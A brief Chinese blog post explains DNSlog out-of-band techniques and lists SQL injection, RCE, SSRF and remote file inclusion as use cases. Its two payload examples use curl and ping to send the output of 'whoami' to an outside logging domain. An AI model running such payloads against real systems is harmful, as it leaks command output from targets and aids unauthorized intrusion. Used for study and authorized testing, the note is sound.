DNSlog

1.原理

通过恶意payload组合的三级域名后对服务器发起的DNS请求。

2.利用场景

SQL注入
RCE（远程命令执行）
SSRF（服务端请求伪造）
RFI（远程文件包含）

3.Payload example

curl http://huanxin.ceye.io/`whoami`
ping `whoami`.huanxin.ceye.io

总结：一切存有HTTP请求，域名请求时都可尝试DNSlog

posted @ 2023-02-26 22:35 cowpokee 阅读(43) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部